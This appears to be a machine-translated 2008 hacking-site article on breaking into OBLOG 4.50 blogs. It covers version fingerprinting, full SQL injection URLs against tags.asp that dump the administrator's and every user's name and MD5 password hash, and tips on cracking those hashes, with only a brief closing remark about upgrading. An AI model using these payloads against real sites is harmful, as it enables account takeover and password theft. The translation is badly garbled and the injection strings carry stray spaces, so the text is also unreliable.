A word to make OBLOG user password obediently sent on-vulnerability warning-the black bar safety net

ID MYHACK58:62200819092
Type myhack58
Reporter 佚名
Modified 2008-05-19T00:00:00


As network technology gradually developed, more and more enterprises have their own website platform, through this platform, external publicity yourself, and the content so employees can better communicate technical issues and working arrangements. OBLOG as a multi-user blog publishing system in a certain program on the enterprise of the above-described various requirements, many companies by OBLOG Setup to build a simple site platform, however whether you know we need only remark you can make the OBLOG system, all user passwords obediently to the intruder? Today we went from the offensive and defensive two angles to look at the intruder is how to by word to make OBLOG user password obediently sent on.

A, determine the platform type and system version:

At any time prior to the invasion of illegal invaders are going to target site, the target system, the target server for the necessary information gathering, which is also the fastest of the found vulnerabilities where the method. When we put a website as an attack target, the first can view the home page in the“source file”to determine its use of the site to build the type of system, and then through the corresponding command to view the site build system version. Following the author from the attack instance to departure.

The first step: we lock up an intranet site, we don't know the site is using what type of app to build, then we can through in home point“view->source file”, then open the index page in the source file to find relevant information, for there is no too much experience of the site administrators will not have all of the version information to be modified, so we can pass the index page of the source file at the beginning or end of the find useful information. Of course, if the site administrator is experienced, he will put all the clues in the version of the leaked wording of the deleted point.

Second step: after the author queries found on the index page at the end of awww.oblog.cnof the words, it seems that the site system is by OBLOG program build. We also successfully completed the system determine the type of work, the invasion of focus to attack the OBLOG system. (Figure 1)


Figure 1

Third step: next We by IE browser directly input http://ip/ver. asp, for the inexperienced network administrators to not delete these default system version of the leaked file, from the display we can see the OBLOG system uses is 4. 5 0 final build0619(access)Edition, Version 4. 5, the database type is access database. (Figure 2)


Figure 2

Thus we successfully completed the target site system to collect work, learned about the site through OBLOG build completion, and the use of OBLOG setup is 4. 5 0 final build0619, the use of the database is access. Second, according to the program and version of vulnerability to intrusion:

Different versions, different application of the vulnerability of different intrusion methods are also different, for OBLOG 4.50 final build0619 version that we can use the label method to achieve the invasion of the purpose, the use ofSQL injectionvulnerabilities let OBLOG will all the user account name and password is displayed.

The first step: by http://ip/tags. asp command to display the OBLOG system all the tag information. (Figure 3)


Figure 3

The second step: we randomly select a label, the requirements of this tag is inside the content, can not be empty. The contents inside including the name, Publisher and publication time. Of course, is particularly important and that is credited under this label corresponds to the ID information, for example, the author selected the label on the side at the address corresponding to the ID of the address information is“tags. asp? tagid=4 2”in. (Figure 4)


Figure 4

The third step: the next is through the Word of the OBLOG systemSQL injectioninvasion, we previously recorded TAGS the tag ID Information based on add the the injection command, for example see above the ID of the address information is“tags. asp? tagid=4 2”, then we enter the following content--

http://IP/tags.asp?t=user&keyword=trace&tagid=4 2%20group%20by%20userid)%20a,oblog_user%20b%20where%20a. userid=b. userid%20and%2 0 1=2%20union%20select%20username%2bchr(1 2 4)%2bpassword,2,3%20from%20oblog_admin%20union%20select%20top%2 0 1 0 0%20b. userName,b. user_dir,b. user_folder%20from%2 0(select%20userid%20from%20oblog_usertags%20where%20tagid=4 2%20and%2 0 1=2

In the code there are two is in tagid=4 2 corresponding to this point requires special attention. Of course, if the purpose of the site use a MSSQL database instead of this article describes the ACCESS database while related to theSQL injectionthe code should also be changed, the specific content--http://IP/tags. asp? t=user&keyword=trace&tagid=4 2 Group By UserId) a,oblog_user b Where a. Userid=b. UserId and 1=2 union select username%2bchar(1 2 4)%2bpassword,2,3 From Oblog_admin union select Top 1 0 0 b. userName,b. user_dir,b. user_folder

The command is executed after the OBLOG will put the administrator account name and password is displayed, we can display the page to see relevant information, in|the front display is the account name, followed by the password, but the password is MD5 encrypted. (Figure 5)


Figure 5

Fourth step: in addition to the Let OBLOG display Administrator the relevant information, we can also through the following instructions let OBLOG display all the user name and password information, which is also very dangerous. Specific injection code--

http://IP/tags.asp?t=user&keyword=trace&tagid=4 2%20group%20by%20userid)%20a,oblog_user%20b%20where%20a. userid=b. userid%20and%2 0 1=2%20union%20select%20username%2bchr(1 2 4)%2bpassword,2,3%20from%20oblog_user%20union%20select%20top%2 0 1 0 0%20b. userName,b. user_dir,b. user_folder%20from%2 0(select%20userid%20from%20oblog_usertags%20where%20tagid=4 2%20and%2 0 1=2

The input is completed all in the OBLOG blog platform on the registered account and password will be displayed, the same password after MD5 encryption. (Figure 6)


Figure 6

Fifth step: with the plaintext account name and MD5 encrypted password, we can essentially direct to crack the plaintext password, only need through some of the MD5 of the query site will be able to MD5 the password successfully reduced to the plaintext information. (Figure 7)


Figure 7

Step six: but not all the MD5 encrypted passwords are possible through the query site counter to detect the plaintext information, and if unsuccessful, then we can only by MD5 brute force tool, on MD5 brute force tool author in previous articles for a detailed description here due to space relationships will not continue to explain, in short, a brute-force MD5 ciphertext required time is relatively long, a 7-bit plaintext password corresponding MD5 password crack take a few days. Of course some MD5 password reverse search site also provide the relevant paid service, part of the password is the reverse lookup we need to pay a dime of the costs, if you think brute force trouble the readers can choose the paid service to quickly solve the problem. (Figure 8)


Figure 8 third, how to guard against that:

The vulnerability exists only in the OBLOG setup is 4. 6 final version before, so as OBLOG the administrator of the site, we just need the OBLOG version need to upgrade, upgrade to the latest version, so that the injection vulnerability will be a smooth patch off, we also completed a security purpose. The latest OBLOG upgrade program we can to the www. oblog. the cn site to download the relevant upgrade methods and update compensate for the vulnerability situation also in the upgrade program in the Help documentation for a detailed description, The interested reader can self-study.

Fourth, the summary:

Online many ready-made site or a CMS or even a BLOG to build a system there are This or that vulnerability, and therefore if the business use these ready-made program to install its own network platform then you have to follow the upgrade information, if necessary, in the site registered members and record their own e-mail address, so that the corresponding program with upgraded and new versions are released when we can in the first time to receive the relevant e-mail to get the upgrade notification. In addition to build the network platform try to avoid the access database appears, after all, access database does not too security, the relevant program vulnerability exists the possibility of relatively large.